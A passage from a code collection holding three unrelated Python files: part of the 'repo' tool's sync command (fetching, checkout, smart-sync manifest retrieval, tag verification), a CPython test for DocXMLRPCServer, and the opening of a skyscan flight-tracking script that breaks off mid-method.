start, finish, success)
return success
def _Fetch(self, projects, opt, err_event):
fetched = set()
lock = _threading.Lock()
pm = Progress('Fetching', len(projects))
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
threads = set()
sem = _threading.Semaphore(self.jobs)
for project_list in objdir_project_map.values():
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
kwargs = dict(opt=opt,
projects=project_list,
sem=sem,
lock=lock,
fetched=fetched,
pm=pm,
err_event=err_event,
clone_filter=self.manifest.CloneFilter)
if self.jobs > 1:
t = _threading.Thread(target=self._FetchProjectList,
kwargs=kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._FetchProjectList(**kwargs)
for t in threads:
t.join()
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects, opt, err_event)
return fetched
def _CheckoutOne(self, opt, project):
"""Checkout work tree for one project
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to checkout.
Returns:
Whether the fetch was successful.
"""
start = time.time()
syncbuf = SyncBuffer(self.manifest.manifestProject.config,
detach_head=opt.detach_head)
success = False
try:
project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync)
success = syncbuf.Finish()
except Exception as e:
print('error: Cannot checkout %s: %s: %s' %
(project.name, type(e).__name__, str(e)),
file=sys.stderr)
raise
if not success:
print('error: Cannot checkout %s' % (project.name), file=sys.stderr)
finish = time.time()
return (success, project, start, finish)
def _Checkout(self, all_projects, opt, err_results):
"""Checkout projects listed in all_projects
Args:
all_projects: List of all projects that should be checked out.
opt: Program options returned from optparse. See _Options().
err_results: A list of strings, paths to git repos where checkout failed.
"""
ret = True
# Only checkout projects with worktrees.
all_projects = [x for x in all_projects if x.worktree]
pm = Progress('Checking out', len(all_projects))
def _ProcessResults(results):
for (success, project, start, finish) in results:
self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL,
start, finish, success)
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if not success:
err_results.append(project.relpath)
if opt.fail_fast:
return False
pm.update(msg=project.name)
return True
# NB: Multiprocessing is heavy, so don't spin it up for one job.
if len(all_projects) == 1 or opt.jobs == 1:
if not _ProcessResults(self._CheckoutOne(opt, x) for x in all_projects):
ret = False
else:
with multiprocessing.Pool(opt.jobs) as pool:
results = pool.imap_unordered(
functools.partial(self._CheckoutOne, opt),
all_projects,
chunksize=WORKER_BATCH_SIZE)
if not _ProcessResults(results):
ret = False
pool.close()
pm.end()
return ret and not err_results
def _GCProjects(self, projects, opt, err_event):
gc_gitdirs = {}
for project in projects:
# Make sure pruning never kicks in with shared projects.
if (not project.use_git_worktrees and
len(project.manifest.GetProjectsWithName(project.name)) > 1):
if not opt.quiet:
print('%s: Shared project %s found, disabling pruning.' %
(project.relpath, project.name))
if git_require((2, 7, 0)):
project.EnableRepositoryExtension('preciousObjects')
else:
# This isn't perfect, but it's the best we can do with old git.
print('%s: WARNING: shared projects are unreliable when using old '
'versions of git; please upgrade to git-2.7.0+.'
% (project.relpath,),
file=sys.stderr)
project.config.SetString('gc.pruneExpire', 'never')
gc_gitdirs[project.gitdir] = project.bare_git
if multiprocessing:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gc_gitdirs.values():
bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except Exception:
err_event.set()
raise
finally:
sem.release()
for bare_git in gc_gitdirs.values():
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def UpdateProjectList(self, opt):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
with open(file_path, 'r') as fd:
old_project_paths = fd.read().split('\n')
# In reversed order, so subfolders are deleted before parent folder.
for path in sorted(old_project_paths, reverse=True):
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
gitdir = os.path.join(self.manifest.topdir, path, '.git')
if os.path.exists(gitdir):
project = Project(
manifest=self.manifest,
name=path,
remote=RemoteSpec('origin'),
gitdir=gitdir,
objdir=gitdir,
use_git_worktrees=os.path.isfile(gitdir),
worktree=os.path.join(self.manifest.topdir, path),
relpath=path,
revisionExpr='HEAD',
revisionId=None,
groups=None)
if not project.DeleteWorktree(
quiet=opt.quiet,
force=opt.force_remove_dirty):
return 1
new_project_paths.sort()
with open(file_path, 'w') as fd:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
return 0
def _SmartSyncSetup(self, opt, smart_sync_manifest_path):
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if '@' not in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
# .netrc file does not exist or could not be opened
pass
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
auth = info.authenticators(parse_result.hostname)
if auth:
username, _account, password = auth
else:
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
transport = PersistentTransport(manifest_server)
if manifest_server.startswith('persistent-'):
manifest_server = manifest_server[len('persistent-'):]
try:
server = xmlrpc.client.Server(manifest_server, transport=transport)
if opt.smart_sync:
branch = self._GetBranch()
if 'SYNC_TARGET' in os.environ:
target = os.environ['SYNC_TARGET']
[success, manifest_str] = server.GetApprovedManifest(branch, target)
elif ('TARGET_PRODUCT' in os.environ and
'TARGET_BUILD_VARIANT' in os.environ):
target = '%s-%s' % (os.environ['TARGET_PRODUCT'],
os.environ['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = os.path.basename(smart_sync_manifest_path)
try:
with open(smart_sync_manifest_path, 'w') as f:
f.write(manifest_str)
except IOError as e:
print('error: cannot write manifest to %s:\n%s'
% (smart_sync_manifest_path, e),
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
return manifest_name
def _UpdateManifestProject(self, opt, mp, manifest_name):
"""Fetch & update the local manifest project."""
if not opt.local_only:
start = time.time()
success = mp.Sync_NetworkHalf(quiet=opt.quiet, verbose=opt.verbose,
current_branch_only=self._GetCurrentBranchOnly(opt),
force_sync=opt.force_sync,
tags=opt.tags,
optimized_fetch=opt.optimized_fetch,
retry_fetches=opt.retry_fetches,
submodules=self.manifest.HasSubmodules,
clone_filter=self.manifest.CloneFilter,
cache_dir=opt.cache_dir)
finish = time.time()
self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK,
start, finish, success)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
start = time.time()
mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules)
clean = syncbuf.Finish()
self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL,
start, time.time(), clean)
if not clean:
sys.exit(1)
self._ReloadManifest(opt.manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
def ValidateOptions(self, opt, args):
if opt.force_broken:
print('warning: -f/--force-broken is now the default behavior, and the '
'options are deprecated', file=sys.stderr)
if opt.network_only and opt.detach_head:
self.OptionParser.error('cannot combine -n and -d')
if opt.network_only and opt.local_only:
self.OptionParser.error('cannot combine -n and -l')
if opt.manifest_name and opt.smart_sync:
self.OptionParser.error('cannot combine -m and -s')
if opt.manifest_name and opt.smart_tag:
self.OptionParser.error('cannot combine -m and -t')
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
self.OptionParser.error('-u and -p may only be combined with -s or -t')
if None in [opt.manifest_server_username, opt.manifest_server_password]:
self.OptionParser.error('both -u and -p must be given')
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) // 3)
opt.quiet = opt.output_mode is False
opt.verbose = opt.output_mode is True
cache_dir = opt.cache_dir
if cache_dir:
if self.manifest.IsMirror or self.manifest.IsArchive:
print('fatal: --cache-dir is not supported with mirror or archive '
'repository.')
sys.exit(1)
if os.path.isfile(cache_dir):
print('fatal: %s: cache_dir must be a directory', cache_dir, file=sys.stderr)
sys.exit(1)
os.makedirs(opt.cache_dir, exist_ok=True)
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
smart_sync_manifest_path = os.path.join(
self.manifest.manifestProject.worktree, 'smart_sync_override.xml')
if opt.clone_bundle is None:
opt.clone_bundle = self.manifest.CloneBundle
if opt.smart_sync or opt.smart_tag:
manifest_name = self._SmartSyncSetup(opt, smart_sync_manifest_path)
else:
if os.path.isfile(smart_sync_manifest_path):
try:
platform_utils.remove(smart_sync_manifest_path)
except OSError as e:
print('error: failed to remove existing smart sync override manifest: %s' %
e, file=sys.stderr)
err_event = _threading.Event()
rp = self.manifest.repoProject
rp.PreSync()
cb = rp.CurrentBranch
if cb:
base = rp.GetBranch(cb).merge
if not base or not base.startswith('refs/heads/'):
print('warning: repo is not tracking a remote branch, so it will not '
'receive updates; run `repo init --repo-rev=stable` to fix.',
file=sys.stderr)
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.mp_update:
print('Skipping update of local manifest project.')
else:
self._UpdateManifestProject(opt, mp, manifest_name)
if self._UseSuperproject(opt):
manifest_name = self._UpdateProjectsRevisionId(opt, args)
if self.gitc_manifest:
gitc_manifest_projects = self.GetProjects(args,
missing_ok=True)
gitc_projects = []
opened_projects = []
for project in gitc_manifest_projects:
if project.relpath in self.gitc_manifest.paths and \
self.gitc_manifest.paths[project.relpath].old_revision:
opened_projects.append(project.relpath)
else:
gitc_projects.append(project.relpath)
if not args:
gitc_projects = None
if gitc_projects != [] and not opt.local_only:
print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name)
manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name)
if manifest_name:
manifest.Override(manifest_name)
else:
manifest.Override(self.manifest.manifestFile)
gitc_utils.generate_gitc_manifest(self.gitc_manifest,
manifest,
gitc_projects)
print('GITC client successfully synced.')
# The opened projects need to be synced as normal, therefore we
# generate a new args list to represent the opened projects.
# TODO: make this more reliable -- if there's a project name/path overlap,
# this may choose the wrong project.
args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd())
for path in opened_projects]
if not args:
return
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
err_network_sync = False
err_update_projects = False
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt, err_event)
_PostRepoFetch(rp, opt.repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
if err_event.is_set():
print('\nerror: Exited sync due to fetch errors.\n', file=sys.stderr)
sys.exit(1)
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop us from non-stopped fetching actually-missing repos: If set of
# missing repos has not been changed from last fetch, we break.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt, err_event))
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.is_set():
err_network_sync = True
if opt.fail_fast:
print('\nerror: Exited sync due to fetch errors.\n'
'Local checkouts *not* updated. Resolve network issues & '
'retry.\n'
'`repo sync -l` will update some local checkouts.',
file=sys.stderr)
sys.exit(1)
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList(opt):
err_event.set()
err_update_projects = True
if opt.fail_fast:
print('\nerror: Local checkouts *not* updated.', file=sys.stderr)
sys.exit(1)
err_results = []
# NB: We don't exit here because this is the last step.
err_checkout = not self._Checkout(all_projects, opt, err_results)
if err_checkout:
err_event.set()
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.is_set():
print('\nerror: Unable to fully sync the tree.', file=sys.stderr)
if err_network_sync:
print('error: Downloading network changes failed.', file=sys.stderr)
if err_update_projects:
print('error: Updating local project lists failed.', file=sys.stderr)
if err_checkout:
print('error: Checking out local projects failed.', file=sys.stderr)
if err_results:
print('Failing repos:\n%s' % '\n'.join(err_results), file=sys.stderr)
print('Try re-running with "-j1 --fail-fast" to exit at the first error.',
file=sys.stderr)
sys.exit(1)
if not opt.quiet:
print('repo sync has finished successfully.')
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, repo_verify=True, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if not repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo."""',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir
env['GNUPGHOME'] = gpg_dir
cmd = [GIT, 'tag', '-v', cur]
result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
env=env, check=False)
if result.returncode:
print(file=sys.stderr)
print(result.stdout, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a * t) + ((1 - a) * old)
def _Load(self):
if self._times is None:
try:
with open(self._path) as f:
self._times = json.load(f)
except (IOError, ValueError):
try:
platform_utils.remove(self._path)
except OSError:
pass
self._times = {}
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
with open(self._path, 'w') as f:
json.dump(self._times, f, indent=2)
except (IOError, TypeError):
try:
platform_utils.remove(self._path)
except OSError:
pass
# This is a replacement for xmlrpc.client.Transport using urllib2
# and supporting persistent-http[s]. It cannot change hosts from
# request to request like the normal transport, the real url
# is passed during initialization.
class PersistentTransport(xmlrpc.client.Transport):
def __init__(self, orig_host):
self.orig_host = orig_host
def request(self, host, handler, request_body, verbose=False):
with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy):
# Python doesn't understand cookies with the #HttpOnly_ prefix
# Since we're only using them for HTTP, copy the file temporarily,
# stripping those prefixes away.
if cookiefile:
tmpcookiefile = tempfile.NamedTemporaryFile(mode='w')
tmpcookiefile.write("# HTTP Cookie File")
try:
with open(cookiefile) as f:
for line in f:
if line.startswith("#HttpOnly_"):
line = line[len("#HttpOnly_"):]
tmpcookiefile.write(line)
tmpcookiefile.flush()
cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name)
try:
cookiejar.load()
except cookielib.LoadError:
cookiejar = cookielib.CookieJar()
finally:
tmpcookiefile.close()
else:
cookiejar = cookielib.CookieJar()
proxyhandler = urllib.request.ProxyHandler
if proxy:
proxyhandler = urllib.request.ProxyHandler({
"http": proxy,
"https": proxy})
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cookiejar),
proxyhandler)
url = urllib.parse.urljoin(self.orig_host, handler)
parse_results = urllib.parse.urlparse(url)
scheme = parse_results.scheme
if scheme == 'persistent-http':
scheme = 'http'
if scheme == 'persistent-https':
# If we're proxying through persistent-https, use http. The
# proxy itself will do the https.
if proxy:
scheme = 'http'
else:
scheme = 'https'
# Parse out any authentication information using the base class
host, extra_headers, _ = self.get_host_info(parse_results.netloc)
url = urllib.parse.urlunparse((
scheme,
host,
parse_results.path,
parse_results.params,
parse_results.query,
parse_results.fragment))
request = urllib.request.Request(url, request_body)
if extra_headers is not None:
for (name, header) in extra_headers:
request.add_header(name, header)
request.add_header('Content-Type', 'text/xml')
try:
response = opener.open(request)
except urllib.error.HTTPError as e:
if e.code == 501:
# We may have been redirected through a login process
# but our POST turned into a GET. Retry.
response = opener.open(request)
else:
raise
p, u = xmlrpc.client.getparser()
while 1:
data = response.read(1024)
if not data:
break
p.feed(data)
p.close()
return u.close()
def close(self):
pass
|
test_docxmlrpc.py | from xmlrpc.server import DocXMLRPCServer
import http.client
import sys
from test import support
threading = support.import_module('threading')
import time
import socket
import unittest
PORT = None
def make_request_and_skipIf(condition, reason):
# If we skip the test, we have to make a request because
# the server created in setUp blocks expecting one to come in.
if not condition:
return lambda func: func
def decorator(func):
def make_request_and_skip(self):
self.client.request("GET", "/")
self.client.getresponse()
raise unittest.SkipTest(reason)
return make_request_and_skip
return decorator
def server(evt, numrequests):
serv = DocXMLRPCServer(("localhost", 0), logRequests=False)
try:
global PORT
PORT = serv.socket.getsockname()[1]
# Add some documentation
serv.set_server_title("DocXMLRPCServer Test Documentation")
serv.set_server_name("DocXMLRPCServer Test Docs")
serv.set_server_documentation(
"This is an XML-RPC server's documentation, but the server "
"can be used by POSTing to /RPC2. Try self.add, too.")
# Create and register classes and functions
class TestClass(object):
def test_method(self, arg):
"""Test method's docs. This method truly does very little."""
self.arg = arg
serv.register_introspection_functions()
serv.register_instance(TestClass())
def add(x, y):
"""Add two instances together. This follows PEP008, but has nothing
to do with RFC1952. Case should matter: pEp008 and rFC1952. Things
that start with http and ftp should be auto-linked, too:
http://google.com.
"""
return x + y
def annotation(x: int):
""" Use function annotations. """
return x
class ClassWithAnnotation:
def method_annotation(self, x: bytes):
return x.decode()
serv.register_function(add)
serv.register_function(lambda x, y: x-y)
serv.register_function(annotation)
serv.register_instance(ClassWithAnnotation())
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.server_close()
PORT = None
evt.set()
class DocXMLRPCHTTPGETServer(unittest.TestCase):
def setUp(self):
self._threads = support.threading_setup()
# Enable server feedback
DocXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
threading.Thread(target=server, args=(self.evt, 1)).start()
# wait for port to be assigned
deadline = time.monotonic() + 10.0
while PORT is None:
time.sleep(0.010)
if time.monotonic() > deadline:
break
self.client = http.client.HTTPConnection("localhost:%d" % PORT)
def tearDown(self):
self.client.close()
self.evt.wait()
# Disable server feedback
DocXMLRPCServer._send_traceback_header = False
support.threading_cleanup(*self._threads)
def test_valid_get_response(self):
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader("Content-type"), "text/html")
# Server raises an exception if we don't start to read the data
response.read()
def test_invalid_get_response(self):
self.client.request("GET", "/spam")
response = self.client.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.getheader("Content-type"), "text/plain")
response.read()
def test_lambda(self):
"""Test that lambda functionality stays the same. The output produced
currently is, I suspect invalid because of the unencoded brackets in the
HTML, "<lambda>".
The subtraction lambda method is tested.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn((b'<dl><dt><a name="-<lambda>"><strong>'
b'<lambda></strong></a>(x, y)</dt></dl>'),
response.read())
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_autolinking(self):
"""Test that the server correctly automatically wraps references to
PEPS and RFCs with links, and that it linkifies text starting with
http or ftp protocol prefixes.
The documentation for the "add" method contains the test material.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-add"><strong>add</strong></a>(x, y)</dt><dd>'
b'<tt>Add two instances together. This '
b'follows <a href="http://www.python.org/dev/peps/pep-0008/">'
b'PEP008</a>, but has nothing<br>\nto do '
b'with <a href="http://www.rfc-editor.org/rfc/rfc1952.txt">'
b'RFC1952</a>. Case should matter: pEp008 '
b'and rFC1952. Things<br>\nthat start '
b'with http and ftp should be '
b'auto-linked, too:<br>\n<a href="http://google.com">'
b'http://google.com</a>.</tt></dd></dl>'), response)
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_system_methods(self):
"""Test the presence of three consecutive system.* methods.
This also tests their use of parameter type recognition and the
systems related to that process.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-system.methodHelp"><strong>system.methodHelp'
b'</strong></a>(method_name)</dt><dd><tt><a href="#-system.method'
b'Help">system.methodHelp</a>(\'add\') => "Adds '
b'two integers together"<br>\n <br>\nReturns a'
b' string containing documentation for '
b'the specified method.</tt></dd></dl>\n<dl><dt><a name'
b'="-system.methodSignature"><strong>system.methodSignature</strong>'
b'</a>(method_name)</dt><dd><tt><a href="#-system.methodSignature">'
b'system.methodSignature</a>(\'add\') => [double, '
b'int, int]<br>\n <br>\nReturns a list '
b'describing the signature of the method.'
b' In the<br>\nabove example, the add '
b'method takes two integers as arguments'
b'<br>\nand returns a double result.<br>\n '
b'<br>\nThis server does NOT support system'
b'.methodSignature.</tt></dd></dl>'), response)
def test_autolink_dotted_methods(self):
"""Test that selfdot values are made strong automatically in the
documentation."""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn(b"""Try self.<strong>add</strong>, too.""",
response.read())
def test_annotations(self):
""" Test that annotations works as expected """
self.client.request("GET", "/")
response = self.client.getresponse()
docstring = (b'' if sys.flags.optimize >= 2 else
b'<dd><tt>Use function annotations.</tt></dd>')
self.assertIn(
(b'<dl><dt><a name="-annotation"><strong>annotation</strong></a>'
b'(x: int)</dt>' + docstring + b'</dl>\n'
b'<dl><dt><a name="-method_annotation"><strong>'
b'method_annotation</strong></a>(x: bytes)</dt></dl>'),
response.read())
if __name__ == '__main__':
unittest.main()
|
flighttracker.py | #!/usr/bin/env python3
#
# Copyright (c) 2020 Johan Kanflo (github.com/kanflo)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from typing import *
import socket, select
import argparse
import threading
import json
import sys
import os
import logging
import coloredlogs
import calendar
from datetime import datetime, timedelta
import signal
import random
import time
import re
import errno
import sbs1
import utils
import paho.mqtt.client as mqtt
from json.decoder import JSONDecodeError
import pandas as pd
from queue import Queue
from flask import Flask
from flask import render_template
ID = str(random.randint(1,100001))
# Clean out observations this often
OBSERVATION_CLEAN_INTERVAL = 10
# Socket read timeout
DUMP1090_SOCKET_TIMEOUT = 60
q=Queue() # Good writeup of how to pass messages from MQTT into classes, here: http://www.steves-internet-guide.com/mqtt-python-callbacks/
args = None
camera_latitude = None
plant_topic = None # the onMessage function needs to be outside the Class and it needs to get the Plane Topic, so it prob needs to be a global
config_topic = "skyscan/config/json"
camera_longitude = None
camera_altitude = None
camera_lead = None
min_elevation = None
min_altitude = None
max_altitude = None
min_distance = None
max_distance = None
aircraft_pinned = None
tracker = None
app = Flask(__name__)
# http://stackoverflow.com/questions/1165352/fast-comparison-between-two-python-dictionary
class DictDiffer(object):
"""
Calculate the difference between two dictionaries as:
(1) items added
(2) items removed
(3) keys same in both but changed values
(4) keys same in both and unchanged values
"""
def __init__(self, current_dict, past_dict):
self.current_dict, self.past_dict = current_dict, past_dict
self.set_current, self.set_past = set(current_dict.keys()), set(past_dict.keys())
self.intersect = self.set_current.intersection(self.set_past)
def added(self):
return self.set_current - self.intersect
def removed(self):
return self.set_past - self.intersect
def changed(self):
return set(o for o in self.intersect if self.past_dict[o] != self.current_dict[o])
def unchanged(self):
return set(o for o in self.intersect if self.past_dict[o] == self.current_dict[o])
class Observation(object):
"""
This class keeps track of the observed flights around us.
"""
__icao24 = None
__loggedDate = None
__callsign = None
__altitude = None
__altitudeTime = None
__groundSpeed = None
__track = None
__lat = None
__lon = None
__latLonTime = None
__verticalRate = None
__operator = None
__registration = None
__type = None
__manufacturer = None
__model = None
__updated = None
__distance = None
__bearing = None
__elevation = None
__planedb_nagged = False # Used in case the icao24 is unknown and we only want to log this once
__onGround = None
def __init__(self, sbs1msg):
self.__icao24 = sbs1msg["icao24"].lower() #lets always keep icao24 in lower case
self.__loggedDate = datetime.utcnow() # sbs1msg["loggedDate"]
self.__callsign = sbs1msg["callsign"]
self.__altitude = sbs1msg["altitude"]
self.__altitudeTime = datetime.utcnow()
self.__groundSpeed = sbs1msg["groundSpeed"]
self.__track = sbs1msg["track"]
self.__lat = sbs1msg["lat"]
self.__lon = sbs1msg["lon"]
self.__latLonTime = datetime.utcnow()
self.__verticalRate = sbs1msg["verticalRate"]
self.__onGround = sbs1msg["onGround"]
self.__operator = None
self.__registration = None
self.__type = None
self.__model = None
self.__manufacturer = None
self.__updated = True
plane = planes.loc[planes['icao24'] == self.__icao24]
if plane.size == 27: # There are 27 columns in CSV file. If it found the plane, it will have 27 keys
logging.info("{}\t[ADDED]\t\t{} {} {} {} {}".format(self.__icao24.lower(), plane["registration"].values[0],plane["manufacturername"].values[0], plane["model"].values[0], plane["operator"].values[0], plane["owner"].values[0]))
self.__registration = plane['registration'].values[0]
self.__type = str(plane['manufacturername'].values[0]) + " " + str(plane['model'].values[0])
self.__manufacturer = plane['manufacturername'].values[0]
self.__model = plane['model'].values[0]
self.__operator = plane['operator'].values[0]
else:
if not self.__planedb_nagged:
self.__planedb_nagged = True
logging.error("%s\t Not found in the database" % (self.__icao24))
def update(self, sbs1msg):
""" Updates information about a plane from an SBS1 message """
oldData = dict(self.__dict__) # save existing data to determine if anything has changed
self.__loggedDate = datetime.utcnow()
if sbs1msg["icao24"]:
self.__icao24 = sbs1msg["icao24"].lower() # Let's always keep icao24 in lower case
if sbs1msg["callsign"] and self.__callsign != sbs1msg["callsign"]:
self.__callsign = sbs1msg["callsign"].rstrip()
if sbs1msg["altitude"] is not None:
if self.__altitude != sbs1msg["altitude"]:
self.__altitude = sbs1msg["altitude"]
self.__altitudeTime = sbs1msg["generatedDate"]
if sbs1msg["groundSpeed"] is not None:
self.__groundSpeed = sbs1msg["groundSpeed"]
if sbs1msg["track"] is not None:
